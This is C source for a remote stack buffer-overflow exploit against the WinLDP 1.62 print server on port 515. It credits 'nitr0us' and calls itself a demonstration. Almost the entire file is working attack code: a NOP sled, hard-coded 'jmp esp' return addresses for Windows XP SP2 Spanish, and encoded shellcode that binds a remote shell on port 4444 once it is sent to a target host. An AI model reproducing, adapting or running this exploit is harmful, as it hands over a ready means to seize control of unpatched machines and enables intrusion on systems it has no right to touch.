/*
 * WinLDP 1.62/Build 1076 remote exploit
 *
 * It's an old bug, but easy-to-exploit...
 * Just for remote exploiting demostration under win32 systems
 *
 * 07/08/06
 * nitr0us <nitrousenador.at.gmail.dot.com>
 *
 * ZonaRTM - http://www.zonartm.org
 *
*/

#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<winsock.h>

#define BEFORE_EIP	524	/* Bytes before EIP */
/* Some possibles ret addresses ... */
/* 'jmp esp' @ <ADDRESS> in <DLL> on WinXP SP2 Spanish*/
/*             0x77D27447   user32.dll  */
/*             0x77D5AEC8   user32.dll  */
/*             0x7C951EED   ntdll.dll   */
/*             0x7C9E751C   shell32.dll */
/*             0x7CB4DC6C   shell32.dll */
#define JMP_ESP		0x7CDCB347 // jmp esp @ shell32.dll on WinXP SP2 Spanish

char bindshell[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* WIN32 BIND PORT 4444 */ 
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

void header()
{
	printf("-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-\n");
	printf("-*     WinLDP 1.62 remote exploit      *-\n");
	printf("-*             by nitr0us              *-\n");
	printf("-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-\n\n");
}

int main(int argc, char *argv[])
{
	WSADATA		wsa;
	SOCKET		sfd;
	SOCKADDR_IN	sin;
	HOSTENT		*remote;
	int			sendn;
	char		command[BEFORE_EIP + 4 + sizeof(bindshell)];

	memset(command, 0x00, sizeof(command));

	if(argc < 2){
		header();
		fprintf(stderr, "Usage: %s <host> [port(default 515)]\n", argv[0]);
		exit(-1);
	}

	if(WSAStartup(MAKEWORD(2, 2), &wsa) != 0){
		fprintf(stderr, "WSAStartup() - Error code: %d\n", WSAGetLastError());
		exit(-1);
	}

	if((remote = gethostbyname(argv[1])) == NULL){
		fprintf(stderr, "gethostbyname() - Cannot resolve hostname. Error code: %d\n", WSAGetLastError());
	    WSACleanup();
		exit(-1);
	}

	if((sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET){
		fprintf(stderr, "socket() - Cannot create a socket. Error code: %d\n", WSAGetLastError());
	    WSACleanup();
		exit(-1);
	}

	memset(&sin, 0x00, sizeof(sin));
	sin.sin_family	= AF_INET;
	sin.sin_port	= htons(argv[2] ? atoi(argv[2]) : 515);
	sin.sin_addr	= *((struct in_addr *)remote->h_addr);

	/* ['\x90'xBEFORE_EIP][JMP_ESP][bindshell] */
	memset(command, 0x90, BEFORE_EIP);
	*(unsigned long *)&command[BEFORE_EIP] = JMP_ESP;
	memcpy(command + BEFORE_EIP + 4, bindshell, sizeof(bindshell));

	/* Connect & Send */
	if(connect(sfd, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR){
		fprintf(stderr, "connect() - Cannot connect. Error code: %d\n", WSAGetLastError());
	    WSACleanup();
		exit(-1);
	}

	header();

	printf("Sending command...\n\n");
	if((sendn = send(sfd, command, sizeof(command), 0)) == SOCKET_ERROR\
			|| sendn != sizeof(command)){
		fprintf(stderr, "send() - Cannot send. Error code: %d\n", WSAGetLastError());
	    WSACleanup();
		exit(-1);
	}

	printf("Sent evil command hehe }:D (%d bytes)\n\n", sendn);

    closesocket(sfd);
    WSACleanup();
	return 0;
}